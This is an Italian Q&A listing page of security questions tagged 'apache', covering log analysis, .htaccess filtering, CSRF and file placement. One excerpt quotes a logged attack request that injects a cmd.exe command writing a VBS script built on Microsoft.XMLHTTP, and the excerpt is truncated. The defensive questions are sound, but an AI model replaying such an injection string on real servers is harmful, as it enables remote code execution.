Domande con tag 'apache'

domande con tag
2
risposte

richiesta HTTP sospetta nei log

Ho trovato questa richiesta nel mio access.log di Ubuntu 14.04 apache2: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHT...
posta 26.09.2014 - 04:19
1
risposta

Questo snippet di htaccess fornisce una sicurezza sufficiente?

Ho scaricato una parte di .htaccess per impedire di utilizzare base64_encode o <script> o _REQUEST nell'URL. È abbastanza sicuro da aiutarmi per una parziale sicurezza, o è solo uno spreco di tempo e risorse? RewriteC...
posta 29.12.2011 - 14:20
2
risposte

Consenti a apache di scrivere nelle directory .ssh degli utenti

So che il titolo sta solo lanciando "la tua configurazione non è sicura", ma permettimi di spiegare. Sto lavorando a un'applicazione che mira a consentire ai client di eseguire il rsync su SSH sul nostro server. Abbiamo bisogno di un'applicaz...
posta 10.04.2012 - 22:49
2
risposte

Protezione CSRF sul lato server?

Sono consapevole che è meglio mantenere la mia applicazione web patchata e protetta da questo tipo di attacchi, ma nel mio caso questa è una cosa più sperimentale. C'è qualcosa di utile, come un modulo che può essere usato per apache (2.4.7)...
posta 02.01.2017 - 11:35
2
risposte

Scrittura di file in una sottocartella della cartella Web (sicurezza apache)

Ho bisogno di salvare i dati di sessione per uno script dinamico di una pagina Web scrivendo su file. Ho due domande: Ci sono delle preferenze di sicurezza riguardo al salvataggio dei dati UNDER della cartella web o OUTSIDE della cartel...
posta 30.03.2012 - 02:33
1
risposta

Preoccupante log di accesso httpd [duplicato]

quindi dopo aver configurato un nuovo server con solo ssh (solo chiave pubblica) e un server web che serve solo un index.html, sono partito per il fine settimana. Effettuare il login lunedì vedo questo tipo di cose nel mio httpd access_logs...
posta 07.04.2015 - 18:16
3
risposte

È pericoloso che apache error_log sia scrivibile?

Stavo leggendo un articolo sui file di log e mi riferivo al registro degli errori di apache menzionato i file di log non dovrebbero essere scrivibili da altri utenti. Come può essere pericoloso? C'è un certo tipo di vulnerabilità che dovrei c...
posta 12.10.2014 - 08:55
1
risposta

Perché proteggere i file con informazioni sensibili con .htaccess?

Mi è stato insegnato che un passo importante verso la sicurezza di un sito web (principalmente con PHP) era quello di memorizzare tutte le informazioni sensibili come le informazioni sulla connessione al database, la generazione di sale, ecc. in...
posta 18.11.2014 - 03:44
1
risposta

Link dannoso? Apache?

Ho un link da spammer, il link è molto strano, ma dopo i reindirizzamenti ho ottenuto la pagina web piena di annunci. Ecco il link (non richiede "http: //"): /0xD805A9E4///RLI=590-UI=273411771-OI=6313-ONI=325215-SI=0-CI=10360210-BI=0-II=199...
posta 31.03.2016 - 21:01
3
risposte

Dove posizionare i file PHP per sicurezza?

Una semplice domanda, dove metti file PHP su un server? Non riesco a trovare alcuna informazione valida su questo. Ovviamente i file pubblici dovrebbero essere nella root del documento da qualche parte / in qualche modo, dal momento che devon...
posta 28.08.2015 - 10:45